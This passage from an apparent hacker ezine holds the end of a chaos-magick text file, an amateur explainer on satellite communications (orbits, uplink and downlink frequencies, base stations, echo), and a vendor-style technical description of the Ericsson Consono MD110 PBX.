to manifest. I'll explain through an example: Let's say you wanted to pass the midterm exams, and casted a ritual in order to increase the percentages of your success. It is likely that you would fail if you weren't paying much of attention in your studies and sat all day long doing nothing. Magick unfortunately can't help you in that; Or let's take the example of our aforementioned desire, to fuck Julie. (sigh) I don't think that would happen if you don't invite her lets say in your house for a cup of coffee, creating a pathway, in order for your Magickal energies that were previously launched from the ritual to manifest. Don't expect her to randomly call you and say, "I'm coming to your place to have sex with you." Well, you don't know, it may happen, but the probabilities of this happening is far less. o Further Reading This textfile was merely written as a startpoint for you the aware reader to further deepen your study in this field. It is by no means complete as you will discover upon further reading. Some books to mention: Hine, Phill. Prime Chaos 1993 (Chaos International BM Sorcery, London WC1N 3XX) Carroll, Peter J. Liber Kaos, Samuel Weiser 1992. Spare, A.O. The Collected Works of Austin Osman Spare, The Sorcerer's Apprentice, 1982. Younger, Malaclypse the. Principia Discordia, Loompanics Unlimited Carroll, Peter J. Liber Null & Psychonaut. Samuel Weiser, 1987. Internet: A good starting place is www.avatarsearch.com, the first occult based search engine, get your warez there. * Chaosbox; Nothing Is True Everything Is Permitted Synner 1999. B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 [!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.05][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!] B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 A Different View on Satellites and Satellite Communication with Simple Words. by The Monty email at: m0nty@hack.gr check http://www.hack.gr/users/m0nty +=============+ || CONTENTS || +=============+ o Introduction o General OverView o A lil' history

o o o o

Satellite's Orbit Setting your satellite in Orb1t The Satellites The Base Stations .Signals from the Base Station .Signals from the Satellite .Watching the Satellite .Control system and Watching system o Signal Delay Echo o Characteristic Frequencies of WESTAR Satellites I, II, III o Closing +================+ || Introduction || +================+ The last years there have seen many investments in satellite telecommunications. Such kind of communications were developed very fast. Satellite telecommunication is used mainly when you want to bring in contact two things that are *REALLY* far away or when the distance between them isn't that big, but there are between them many obstacles that makes the communication almost immposible (i.e. deserts, jungles etc..). +====================+ || General OverView || +====================+ A satellite connection consists of the satellite and the base stations (scheme 1). If you check this from a technical view you could say that the base stations work as terminals and the satellite as a re-transmitter. (scheme1) |~~~~~~~~~~~~~| . where AAA is the signal | | | Satellite | |_____________| AAA AAA AAA AAA ////// AAA AAA \\\\\\ //// AAA AAA \\\\ /\\ AAA AAA //\ \\\\ AAA AAA //// \\\ AAA AAA /// /\\\ ///// \\\\\ ///\ / \\\\\/// \\\///// \ / \ / \ / BS \ / BS \ ~~~~~~~~ ~~~~~~~~

The distance between one base station to the other in order for them to communicate is about 40-50 kilometers. If you increase this distance then you will have problems with the curve of the earth. In order to assure "eye" contact, the stations should be placed in high places and their antennas in big webs. Besides that, when two base stations are far apart then the signal isn't stable. This happens cause the antennas receive more than one signal (they receive the signal AAA that we want but they receive other signals too from other transmitions after

they reflect on the sea etc). This problem that it would cause are voids between the conversations. These problems can't be solved if the distance is about 50 to 100 km. If the stations are on the land then we can use re-transmitters so that we won't loose the signal. If the stations have sea among them (one station in America and the other on Europe) then we would have to put a very powerfull re-transmit in the middle of atlantic ocean. Well that is imposible, so how can these stations communicate? They can communicate with a satellite! The satellites are like a re-transmiter, that aren't placed on earth but on space (in the three dimensions). The satellite is in a big height so problems like uncontinuous signals are limited. +==================+ || A lil' history || +==================+ The first telecommunication satellites were set on passive mode. Which means that they could only reflect the signals they took from eartch base stations on their surface. They were something like big baloons without any electronic shit on them. These satellites were experimental projects called ECHO 1, ECHO 2 and started space tripping in 1960. In 1962 the Telstar was launched. Telstar was an active satellite, it had electronic devices that increased the signal it received. This satellite was used for the transmision of TV programs (another way to brain-damage you). On 6 April 1965 a satellite launced over the Atlantic ocean by the name INTELSAT I, the first telecommunication satelite. It was owned by a national telecommunication organaization called INTELSAT which was established in 1964. This satellite was active and it could transmit 240 telephone circuits and a TV program. Since then INTELSAT used the lines of satellites II, III, IV, IV-A and V were the capacity was always increasing. The satelites of line V have capacity of 12000 telephone circuits and *TWO* TV programs (major brain-fuck). Nowdays almost every country of the world cooperate with INTELSAT and communication can be established even when you are on a ship. +=====================+ || Satellite's Orbit || +=====================+ The time that a satellite is doing in order to do the whole round of the earth is called period (T) and it depends (as physics says) from the mass of the earth, the mass of the satellite and the distance between the satellite and the center of the earth. Now since the mass of the satellite is too small against of the mass of the earth the period depends practically only from the distance. From physics we have : 2 * pi T = --------------- * (Re + h)^3/2 Re * g^1/2 With Re = earth radius g = acceleration of gravity on the earth's surface h = satellite's altitude Now if you put h = 36000 kilometers (km) then the satellite has a period time T = 24 hours. So lets say that you put a satellite in orbit with

altitude 36OOO km from the surface of the earth above the equator heading to the East. If you observe the satellite from the surface of the earth then you'll notice that it doesn't move and it will be seen only from specific countries. These kind of satellites are called geostationary (geostationary orbits). Now because these satellites are not totaly steady when you observe them from the earth they are called synchronous. Well.. in order to be more exact about the equatorial orbit the altitude should be 35784km (or 19,322 n.miles or 22234 st.miles) and the period is 23Hrs 56mins and 4.009054sec. The characteristics of Geostationary Satellite Orbit, for the special case if a synchronous orbit-satellite in prograde circular orbit over the equator. Altitude Period Orbit inclination Velocity Coverage Number of satellites Subsatellite point Area of no coverage Advantages 19322n.miles, 22235st.miles, 35784km 23Hrs, 56mins, 4009sec (one sidereal day) 0o 6876 st.miles/hour 42.5% of earth surface Three for global coverage with some areas of overlap (This will be explained later on) On the equator Above 81o north and south latitude Simpler ground station tracking No handover problem (Explained later) Nearly constant range Very small Doppler shift

If a satellite has different period from the earth then they are called asynchronous. The asynchronous satellites are setting and rising so the demand in order to have continious communication with them a large amount of satellites so that when one of them is setting the other should rise (handover problem). Of course in every base station there should be 2 antennas, one that communicates with the satellite that is setting and the other with the one that is rising. The first experimental satellites where asynchronous. Today the satellites that INTELSAT uses are synchronous and above the level of the equator. From a synchronous satellite the earth is seen from a cone of a 17o angle. If 3 synchronous satellites get in orbit over the equator in the correct possitions (areas of overlap 120o) they are able to cover all earth except the two poles (North and South). These possitions are above the Atlantic, the Pacific and the Indic oceans. From Greece you are able to see the satellites that are above the Atlantic and the Indic ocean. +===================================+ || Setting your satellite in Orb1t || +===================================+ I tried to do some ascii to help but they seemed impossible (how the fuck can you do a circle with ascii !?!?!?!? heh). The way that i will describe is in physics.. well it's not the exact way that NASA lunches her sats but it's based on this. Anyway lets go on with the show. You lunch the satellite from the earth with a rocket.When the rocket reaches the altitude of 36OOO km it seperates and leaves the satellite there. Now due to the

velocity that the satellite has from the force (gravity) of the earth it moves in eliptical orbit. One of the hearth of the ellipses is the earth with the closest to earth distance 550 km (Perigee) and the farest from the earth distance 36OOO km (Apogee). Now, from the earth where you are, you control the satellite remotely and you order it to lunch small rockets when the satellite is on the farest point from the earth (Apogee) in such a way so that it could change its eliptical orbit in circular orbit. The resault of that is that the satellite will change its orbit to almost circular and due to it's altitude the period will be 24 hours. Thanks to the gravity force from the earth and the velocity of the satellite you won't have to use any other force to move it (cause of the zero frictions). This means that you won't have to use anymore fuels. In reality the possition of the satellite from the earth isn't stable cause of the sun's and the moon's gravity and the radiation pressure that affects the satellite. So in order to avoid this just use some of your fuels to correct your satellite's orbit whenever it shows problems. +=================+ || The Satellite || +=================+ The satellite as we said above is working as signal re-transmiter. It receives signals from a base station on earth (or maybe from another satellite) and resends them back in another base station (or another satellite). The satellite receives many signals from the earth stations. These signals are in the area of 6 GHz but they are all different between them. When it receives the signals it increases them and sends them back in all base stations *BUT* it uses the area of 4 GHz to do that. Which means that the satellite dicreases the communication frequency when it sends back. Every base station when it receives from the satellite chooses that frequency area that conteins the signals of the base stations that send them on the satellite. Now with more simple words, the base station A wants to communicate with the base station B. So the A sends the signal on the satellite in 6 GHz frequency. The satellite sends the signal in 4 GHz at the base station B, among with signals for other base stations. The base station B now, chooses the frequency area that has the signal that was send from the base station A. (I hope that didn't mess much with your minds if it did it's cause ma english suck). Anyway, the frequency area that is used is: 5925 - 6425 MHz from the earth to the satellite. 3700 - 4200 MHz from the satellite to the earth. INTELSAT-V though uses besides these, the area 14/11 GHz (where 14 is from earth to satellite and 11 from satellite to earth) Nowdays they experiment with many other frequencies (Small brief later) o o o o A telecommunication satellite consists from: The antennas The information, control and remotely control centers The electricity system The transponders

The satellite has antennas that operates in the area of the microwaves with radiation diagram pointed to the earth so that it wouldn't transmit

energy radiation to the space. These antennas are used for re-transmiting. Besides these antennas it has another set of antennas for HF (3 - 30MHz) and VHF (30 - 300MHz) for its remotely control from the earth. Now a bit ascii gfx!!!! I will show a simple diagram of te INTELSAT-III This satellite has 2 transponders of 225MHz that uses the same antenna with angle 17o. (scheme2) 5930-6155MHz 3705-3930MHz Point |~~~~~~~| |~~~~~| |~~~~~| |~~~~| | Starting | | | M | | E | | E | | Point |~~~~~~~~~~| E |~~~~|_____|~~~|_____|~~|____|~~~~~| | | | |_______| | | | | | | | | | | | | | | |~~~~~| | |____| |_____| | | | |_____| 2225MHz | | | | | | | | |~~~~~~~| |~~~~~| |~~~~~| |~~~~| | | | | | M | | E | | E | | |~~~~~~~~~~| E |~~~~|_____|~~~|_____|~~|____|~~~~~| |_______| 6195-6420MHz 3970-4195Mhz The satellite's antenna that receives the signal comes from a base station on earth and it's a signal in the area of 6 GHz. This signal is being enhanced with the help of the transponders and then with the help of the 2225MHz frequency it dicreaces the frequency area of the signal in 4 GHz. After to steps of enhancing the signal is send back in the antenna. The anametabibastes enhance the signal at 104dB so the frequency area from 6 GHz changes to 4 GHz. The satellite INTELSAT-IV uses 12 anametabibastes of 36MHz. With the control centers and the other electronic sh1tz that i can't ofcourse ascii graph them the satellite sends information about it's operating status to the base stations on earth. So if the dewds at the base station find that something is wrong with the orbit or the possition of the antennas they remotely change them and fix the problem. The electronic shitz that are on the satellite should be extremly light with little dimentions. They should need small amount of electricity and should not be easy damage. The constractors of the satellite in order to achive this are using special matereals after they have tested them on high temporature and other strength tests. The electricity is given to the satellite from light-elements that transforms the solar energy to electric. These elements til the lines of INTELSAT-IV were covering the outside of the satellite. Now in the INTELSAT-V they use big wings with them on. In order to protect these fwtostoixeia from obstacles that may hit the satellite they are covered with a special material that lets the solar beems come through it. Inside the satellite there are accumulators that get charged in order to use the electricity later (ie when the satellite is in the shadow of the earth and the solar beams can't hit its wings). Well thats all for the satellite, now we'll talk about the base stations. +=================+

|| Base Stations || +=================+ o o o o A base station consists from: Antennas Radioelectric devices The control panel The electricity devices

In the base stations for satellites they use Cassegrain antennas (I will describe most kinds of antennas in another article). This antenna is able to move and rotate in different ways. The antennas are "installed" in different geografic longitudes and latitudes. So the angles that they "observe" the satellite (elevation angle or look angle) are different. However even in the base station the look angle of one satellite differs from the angle of another satellite. As we show above the satellite isn't stable. So in order for the base station's antennas to watch the satellite all the time it should rotate too. > Signals From the Base Station The signal that comes from the TV spectrum is going in a special device that forms it in the 70 MHz frequency. When the signal gets outta there it goes in the frequency transformer which transforms the signal from 70 MHz in the area of 6 GHz. The signal goes through amplifiers and from there it is send to the antenna and the satellite. > Signals From the Satellite The signal that comes from the satellite is in the area of 3700 to 4200 MHz and is gothered at the antenna in order to be send at the base station. Cause of the "weakness" of the signal it goes through many amplifiers (parametric amplifiers). These parametric amplifiers are freezed in a 20o Kelvin degrees (which is -253o Celsius) in order to avoid any additional noise. The amplified signal now goes through the received frequency transformers and they transform the signal from the area of 3700 - 4200 MHz in the area of 70 MHz. The signal at last goes in a special device that turns it in TV spectrum. We should should be noticed that for each country that the satellite communicates there's a different frequency transformer. > Watching the satellite The base station's antennas must point all the time the satellite. The different possitions that the antenna should take each time the satellite moves can be done either manually either automaticly. The automatic watch of the satellite from the antenna is done by a signal that is send from the satellite. This signal is controlled from 4 points, 2 at the vertical and 2 at the horizontial diameter of the antenna. When the antenna is not pointing the satellite then the time that the signal comes in those 4 points is different. This time difference causes (with the appropriate hardware) the antenna to move in the exact possition that points at the satellite. > Control System and Watching System Yup! There is a big room where everything is controled. In this room (console room) there are all the hardware that gives you the chance to control the satellite. From there they count the level of the signal and they can check the antenna's possition. There are also hardware that indicates the status of the main devices like frequency transformer. And of course a big screen (if they transmit TV program) that gives them

the chance to watch the TV program and ofcoz fuk up their brains. The base station gets it's electricity that it wants from the countrys national power provider. Of course there are systems that can backup the station incase of a temporary power down. +=========================+ || Signal Delay and Echo || +=========================+ It's not difficult to understand that since the satellite is on about 36000km above the earth surface the time that the signal wants to be send from a base station A on earth to the satellite and then back to a base station B on earth is important. The smaller distance of the above course is about 72000km. Now the velocity of an electromagnetic wave in space is about 300.000 km/sec so the signal needs in order to get from one base station to another via a satellite about 240 ms. If this is about voice communication then the same delay will be for the reverse course. So two people will have about 0.5sec delay in their conversation. This may seems not a big deal maybe cause you are unfamiliar with delays (ask someone who blueboxed, we know about delays!). This delay creates an additional problem, it creates echo. The echo is being created from the refleaction of a part of the signal in the point that the 4line connection becomes 2line. This recycled signal comes back to the one that spoke so he hears his echo. (scheme3) --1--> --1--> ____________|\_____|\________ | |/ |/ | | | | | |~~~~~~| |~~~~~~~~| -1--> | | | | --1--> A--------| | | |-----------B <--2-- |______| |________| <--2-| | | | | | |_________|\_______|\________| <--2-- |/ |/ <--2-The arrows with 1 (--1-->) show the course of the normal signal and the arrows with 2 (<--2--) shows the course of the signal that comes from the reflection so it causes echo. In order to deal with the echo problem they install some special devices that decrease the phenomenon of echo. These devices increase the normal signal and dicreases the signal that creates echo. +==============================================================+ || Characteristic Frequencies of WESTAR Satellites I, II, III || +==============================================================+ In the near future I'll write a phile with all these freqencies about many satellites. But till then check these out WESTAR I, II, III

~~~~~~~~~~~~~~~~~~~ Sponsoring Activity: Western Union, 1 Lake St., Upper Saddle Rive, N.J. Other ownership Interests : Fairchild Industries and Continental Telecom,Inc., which jointly own American Satellite Corp.

Subsatellite Points: Westar I and II, 79o W Westar III, 91o W Capacity per Transponder: 1500 one-way VF channels or 1 TV signal with audio or 60 Mbps of data Channels |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| | 1 2 3 4 5 6 7 8 9 10 11 12 | |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| | 5945 5985 6025 6065 6105 6145 6185 6225 6265 6305 6345 6385 | | | 5925 Receive Band 6425 | | | | | | | | | Channels | |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| | 1 2 3 4 5 6 7 8 9 10 11 12 | |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| | 3720 3760 3800 3840 3880 3920 3960 4000 4040 4080 4120 4160 | | | 3700 Transmit Band 4200 +===========+ || Closing || +===========+ Well that was it.. Hope you enjoyed the phile. My poor english may caused you some difficulties on understanding some parts so if you have any questions just email me. Greetings one channels #9x #grhack #banana #b4b0 #darkcyde #bluebox(IRCnet) #hax(IRCnet). Special thanxx to the teams 9x, b4b0 and d4rkcyde. This phile was written by The Monty. B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 [!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.06][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!] B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 The Ericsson Consono MD110 PBX by pbxphreak <chris@lod.com> Here is some info for you people about the Ericsson MD110 PBX system. :) Ericsson's Consono MD110 PBX, formerly known as the MD110 Business Communications System, is a family of three stored program-controlled voice and data PBX models for medium to large businesses. Each member Consono MD110 family accommodates a maximum of 90 incoming lines, but models differ in terms of station capacity, with the Consono MD110/20 (SPC) of the the handling

up to 220 stations, the Consono MD110/50 handling a maximum of 310 stations and the Consono MD110/90 accommodating up to 330 stations. The models can be combined in any configuration to support a maximum of 20,000 voice and 10,000 data stations. The Consono MD110 PBX is Centrex-compatible and non-blocking, and can accommodate a variety of facilities, including loop-start, ground-start, T1, direct inward dial (DID), two- and four-wire E&M tie lines, ISDN, PRI, and CEPT-1 trunks. The system also accommodates fiber-optic and microwave links. Consono MD110 PBX data communications capabilities can be enhanced with optional terminal adapter units, coax asynchronous converters, and modem access units. The Consono MD110 PBX uses a distributed processing, star-type architecture that features end-to-end digital technology and is based on the L. M. Ericsson AXE-10 processor. Consono MD110 software consists of functionally related program units designed to provide optimal memory use and simplified database access. Ericsson software adheres to international communications standards and is specifically designed to allow multinational organizations to utilize Ericsson Network Signalling System (ENSS) software and operate under a homogeneous communications environment. Ericsson offers a variety of application-specific, integrated subsystems for use with the Consono MD110; these applications are supported at all system sizes. Consono MD110 applications provide functions to suit individual user requirements, including: Automated attendant functionality. Cable records and equipment inventory maintenance. Call detail recording and accounting activities. Change requests and work order processing. Computer Supported Telephony Applications (CSTA). Fax Mail. Hospitality services. LAN compatibility (token ring and Ethernet support). Online directory. Real-time performance monitoring for ACD agents. Traffic analysis with graphical display. Videoconferencing. Voice processing and integrated voice response.

The Consono MD110 is noteworthy because it was one of the first PBXs to support wireless communications. Ericsson's wireless system was first trialed in the US as the DCT900 Personal Communications System, which was based on DECT and Cellular Telephone-3 (CT3) technology. The system operated in the 940MHZ to 952MHz frequency range. In mid-1993, Ericsson, which had been waiting for an FCC allocation of frequency spectrum in order to commercially release the DCT900 system, opted instead to modify the system to conform to current FCC policy and release it as the Freeset 900. Freeset 900 is based on an adjunct controller that uses analog links to the main PBX. Freeset 900 can be supported on the Consono MD110 or any non-proprietary analog or digital PBX, key system, or Centrex system. The Consono MD110 is fully compliant with AT&T's Integrated Services Digital Network (ISDN) Primary Rate Interface (PRI) standards and NORTEL's DMS-100 ISDN PRI. Ericsson's test results indicate that the Consono MD110 system also can provide PRI connections to any common carriers using DMS-100 or DMS-250 switches. The Consono MD110-supported ISDN capabilities that have been tested include Caller ID, as well as basic call connections for voice-data and call-by-call service selection over public, private, tie (PBX-to-PBX)

foreign exchange, in-WATS, and out-WATS lines. The Consono MD110 has an enhanced networking capacity with the Broadband Premises Network. The Consono MD110 equipped with a Broadband Premises Network can support voice calls, Ethernet and token-ring LAN traffic, IBM terminal connections, and RS-232C synchronous and asynchronous communications via a fiber backbone. The Consono MD110 PBX accommodates standard analog dial-pulse and dual-tone multifrequency (DTMF) station equipment, in addition to the proprietary DBC 600 Series of digital phones, which supports simultaneous voice and data transmission and a 2B+D line card interface. The DBC 600 Series also incorporates circuitry that allows data terminal equipment including synchronous and asynchronous terminals and printers, to access the PBX. Digital telephones can achieve PC-to-telephone integration via Ericsson's Personal Efficiency desktop application. The Consono MD110 Series is available in three configurations with compatible hardware and software components. Station equipment and peripherals are common throughout the product line, facilitating upward migration, system maintenance, and user training. The basic building block of the Consono MD110 PBX is the line interface module (LIM)--a processor-based, non-blocking, time-division switch capable of accommodating approximately 250 voice and data lines. Each LIM can function as an autonomous PBX, or as an integrated part of a larger system. Up to two LIMs can connect directly through 32-channel, pulse-code modulation (PCM) links; three or more LIMs connect through the Consono MD110 PBX's second building block -- a non-intelligent, modularly expandable digital group switch (GS) that transmits PCM voice, data, and control signals between LIMs. Users can connect multiple LIM/GS configurations in a star/star architecture or via a custom configuration. The Consono MD110 system achieves redundancy by duplicating the control system, switch, and software units. In the event of a system failure, a switch automatically activates the passive configuration to provide uninterrupted operation. A typical Consono MD110 system consists of one or more LIMs connected directly (with a maximum of two LIMs) or through a group switch. The Consono MD110 system is designed for autonomous LIM functioning; each LIM operates as a fully functional independent module with a separate power supply, battery backup, and software to control call processing. Each LIM is capable of communicating with all other LIMs in the system; inter-LIM call processing and feature access is transparent to the user and enables LIMs to share resources. LIM analog and digital interface circuits are arranged, with a microprocessor in groups of eight per card; each LIM supports up to 250 voice and data ports. LIMs also provide such service circuits as tone receivers for DTMF dialing, ringing equipment control circuits, and conference circuits that support up to eight simultaneous conversions. Analog circuits convert voice input from telephone and trunk lines to PCM-coded digital data; Ericsson digital telephone units and attendant consoles contain internal analog to digital circuitry for voice digitization. Groups of these line circuits form a line signaling subsystem. The Consono MD110 switching unit subsystem (SWS) accepts serial PCM-coded data and converts it to parallel form for control by the processor subsystem (PRS). The PRS controls data communications to and from the LIM through a 32-channel PCM link, as well as line circuits within the LIM through time division switching. The PCM links carry PCM-encoded voice and data in ITU

format at rates of up to 2.048M bits per second (bps). Consono MD110 systems consisting of three or more LIMs require a group switch. The GS is a non blocking, time-division switching matrix that connects multiple LIMs through the 32-channel PCM links. A fully equipped GS consists of eight cabinets (group switch modules) and can accommodate up to 248 PCM links, allowing expansion of the Consono MD110 PBX to its 26,000-station maximum capacity. Each Consono MD110 LIM hardware cabinet contains two magazines, each of which can house a maximum of 24 circuit boards. The magazines connect to one another through a printed-circuit backplane; external connections to telephone lines are made from the front of the printed circuit cards. Consono MD110 systems are composed of one or more LIM cabinets (up to a maximum of 124) for 26,000 universal ports. Customers typically structure the Consono MD110 to meet voice/data port requirements by adding LIM cabinets; cabinets can be arranged in single or double (back-to-back) rows to adapt to a variety of floor plans. Each LIM also includes five hardware subsystems: the line signal subsystem (LSS), the switch subsystem (SWS), the processor subsystem (PRS), the input output subsystem (IOS), and the service/maintenance subsystem (SMS). The LSS includes interface circuits that link the LIM with external communications devices such as telephones and attendant consoles, as well as the service circuits that provide call processing functions (e.g., tones and ringing). The SWS establishes and releases connections between the stations, trunks, and other equipment, and provides two-way communications among this equipment using time-division switching. The PRS, which comprises the LIM processor unit and the memory unit, oversees the LIM functions using stored programs and responds to status changes detected by the device circuits. The IOS interfaces such digital peripherals as display terminals and cartridge tape units to the SWS, which, in turn, communicates with the PRS; a standard RS-232C interface (with 300- to 9600-bps signaling) connects I/O devices. Each I/O board supports four cartridge tape units and three terminal devices; up to six terminals can be simultaneously active. The SMS monitors system hardware and software, detects faults, generates alarms, aids in fault clearing, and restarts individual devices, programs, LIMs, or the entire system. The SMS also deactivates faulty hardware. Broadband Premises Network. The Consono MD110 Broadband Premises Network (BPN) integrates the PBX with a user's data and videoconferencing network. The Consono MD110 BPN thus enables users to run voice, data, and video over a shared 100M-bps fiber backbone, using a 2B+D format. Transmission media can include twisted pair, fiber, T1, or microwave for linking nodes up to 1200 miles apart. The BPN is configured with Luxcom Broadband Interface Module multiplexing hubs, which are distributed throughout the user site and are connected over a dual fiber ring. Each hub supports up to eight access modules, which, in turn, support IBM terminal, LAN voice, or video traffic. Voice calls are routed from the Consono MD110 LIMs to a Broadband Interface Module for transport across the backbone. The Consono MD110's software program units are organized into functionally related modules and central and regional operating segments to optimize system memory use and simplify database access. Each LIM is equipped with regional software to support fully independent call processing within that particular LIM (intra-LIM). Additional program units in each LIM support multiple connections between LIMs and provide access to operating and service software on an as-needed basis. Inter-LIM communications are controlled by

central software, which is accessed when a LIM transfers call processing functions to another LIM. Central software is duplicated in multiple LIMs to improve system reliability. Each Consono MD110 program unit has a separate database, ensuring that software faults can be isolated in individual program modules and enabling users to implement changes in specific software modules without affecting the entire operating system. Consono MD110 program units are divided into two main functional categories: the audio communication systems (ACS) and the service system (SES). ACS software controls all functions related to establishing connections between stations, trunks, and other terminal equipment connected to the system, and includes these software components: - Line Signaling Subsystem (LSS)--Controls the signaling functions of the LSS hardware, including the application of tones and ringing. - Traffic Control System (TCS)--Sends program signals to the switching subsystem to control the set-up, monitoring, and release of connections in the switching matrix. - ACS Handling System (AHS)--Stores such information as directory numbers and class of service designations, and permits users to change this data at any time. Consono MD110 service system software is composed of the operating system, the I/O programs, the maintenance and administration routines, and the switch control. SES software modules include: - Switching Subsystem (SWS)--Controls the operation of the switching matrix hardware in response to program signals from the TCS software. - Processor Subsystem (PRS)--Directs the overall operation of the LIM processor, scheduling the running of subsystem programs and performing timing functions. - Service/Maintenance Subsystem (SMS)--Includes programs that continuously monitor system operation, detect faults, and generate alarms. - Input/Output Subsystem (IOS)--Directs the loading and dumping of software and provides access to stored data that requires periodic modification. The Consono MD110 also suports the proprietary Freeset 900, a wireless telephone with an interactive display. The Freeset 900 allows six hours of talk time and 60 hours of battery backup for extended use away from the office. The set weighs less than seven ounces and provides full speech encryption. The Freeset 900 Personal Communications System includes base stations and a radio exchange unit in addition to the handsets, and can support more than 150,000 terminals in a square mile. The radio exchange unit is connected via hard wire to the Consono MD110 PBX and to the one or more base stations. The system is based on CT3 technology, which is similar to the technology for cordless home telephones; however,the Freeset 900 system requires a base station and radio switch. Additional base stations can be included to cover the desired area and can provide seamless handoffs. The system's CT3 technology offers full speech encryption, PBX feature access, and no airtime premiums. The Consono MD110 PBX is designed to accommodate requirements for switched voice and data communications. Internally, the switch makes no distinction between data and voice transmission; both are performed independently or simultaneously using a single twisted-pair of wires. Data devices and digital

telephones use the same digital line cards. The bit-transparent architecture of the Consono MD110 supports both asynchronous and synchronous data transmission independent of protocol. The system also includes a digital trunk interface and provides data users with direct access to such features as host port contention, domain switching, and destination queuing, in addition to data call origination options such as telephone keypad dialing, smart modem command, menu selection, single button access, and hotline connection. The various data communications devices enabling multiple data applications include terminal adapter units, modem access units, data line units, and a digital trunk interface. Terminal adapter units (TAUs) connect data terminal equipment, including display terminals and computers, to digital lines served by the Consono MD110. TAUs enable users to add data communications equipment to the system without affecting the system's integrity or operation. The Consono MD110's digital connection format eliminates the need for digital-to-analog and analog-to-digital conversion for internal data switching, and for on-net communications between multiple Consono MD110s connected via digital trunks. Each TAU supports the appropriate signals on an RS-232C or ITU V.35 interface, along with the appropriate transmission mode and speed, number of start/stop bits, and interface type. TAUs support both asynchronous (up to 38.4K bps) and synchronous (up to 64K bps) operation, in full-duplex mode, and provide visual indicators that enable users to monitor call status. In addition, a local test button allows users to test system operation and isolate faults. Terminal Adapter Unit for Standalone Operations (TAU-S). TAU-S is a standalone unit designed for data-only applications--such as shared printer connections, computer ports, and isolated terminals -- within the Consono MD110 system. TAU-S supports transmission speeds of up to 19.2K bps asynchronous and 48K bps synchronous through an RS-232C interface. Four programmable buttons located on the unit's front panel allow users to access a set of predefined functions and call destinations. Power, test, receive data, transmit data, and data terminal-ready indications are provided by status LEDs. The unit also incorporates a two-digit display that indicates call progress. TAU-S connects to the Consono MD110 via a single twisted- pair wire. Users program TAU-S options from the Consono MD110 administration terminal; fault location and loopback testing are initiated from the unit's front panel test button. Terminal Adapter Unit for High-Speed Operations (TAU-H). The TAU-H unit operates in standalone mode for data-only transmission and is intended primarily to support high-speed synchronous ECMA or DMI applications such as host-to-host or LAN-to-LAN communications. TAU-H supports both asynchronous and synchronous operations at up to 19K bps through an RS-232C interface, and synchronous operations at up to 64K bps through a V.35 interface. The TAU-H unit incorporates a Dual In-Line Package (DIP) switch that allows the user to select one of the following operating modes: standard TAU-H mode; ECMA Rate Adaptation protocol; DMI protocol; or Menu Interface with autobaud detection. The Menu Dialing feature is provided through system firmware and supports data connections and data configuration changes from the DTE keyboard. Terminal Adapter Unit Asynchronous. The TAU-2620 unit for asynchronous communications operates in standalone mode for data- only transmission, and

in dual mode for simultaneous voice and data transmission. In standalone mode, TAU-2620 transmits data at user-programmable speeds of up to 19.2K bps. TAU-2620 operation is controlled by on-board firmware; the unit supports Hayes SmartModem keyboard dialing commands and autobauding, and includes a user-enabled/disabled menu overlay that provides operational prompts. TAU-2620 also incorporates an RS-232C/V.24 connector to facilitate data connections. The Consono MD110 PBX DS1 digital trunk interface combines 24 64K-bps DS0 channels into a single data stream operating at the DS1 rate of 1.544M bps. The T-carrier-compatible DS1 digital trunk interface, used in conjunction with multiple Consono MD110 systems or other PBXs, provides transparent transmission of digital communications. The channels are administered as separate trunk circuits assigned to trunk groups, allowing features to be restricted in the same manner as analog trunks. Each DS0 channel can be used for digitized voice, data, or signaling transmission, and can be treated as a separate trunk circuit. The DS1 trunk supports both D4 and Extended Superframe Format (ESF); the DS1 in CAS Mode interfaces to a digital central office or an analog central office via a D3 or D4 channel bank. The Consono MD110 PBX offers a wide range of features to ensure efficient communications and increase user productivity. consono MD110 system, station, and attendant features are accessible from analog and digital telephones, as well as from the attendant console. The system also supports several applications packages that provide additional call processing and management features. Standard features of the Consono MD110 include operator-controlled system administration, automatic callback, executive intrusion, call waiting, call diversion, and follow-me paging. In addition, the Consono MD110 PBX supports such call/cost management features as least cost and alternative routing, account codes, and toll restrictions. Data features include packet switching, protocol emulation, gateway functions, host port sharing, domain switching, and destination queuing. In addition, data feature users can utilize keypad dialing, menu selection, single-button feature access, and hotline functions. All system features can be networked transparently through the various nodes of a networked Consono MD110. System features of the Consono MD110 are: Abbreviated dialing. Code call access. Conference (add-on, attendant, flexible station control). Data privacy and restriction. Dial dictation access. Direct in lines. Direct inward dialing (DID). Direct outward dialing (DOD). Flexible numbering plan. Hotline. Intercom blocking. Manual line service. Night service. Off-premises extensions. Power failure transfer. Remote maintenance facility. Remote system alarm access.

Station override security. Tandem trunking. Tenant service. Trunk queuing. Uniform numbering plan. Voice paging.

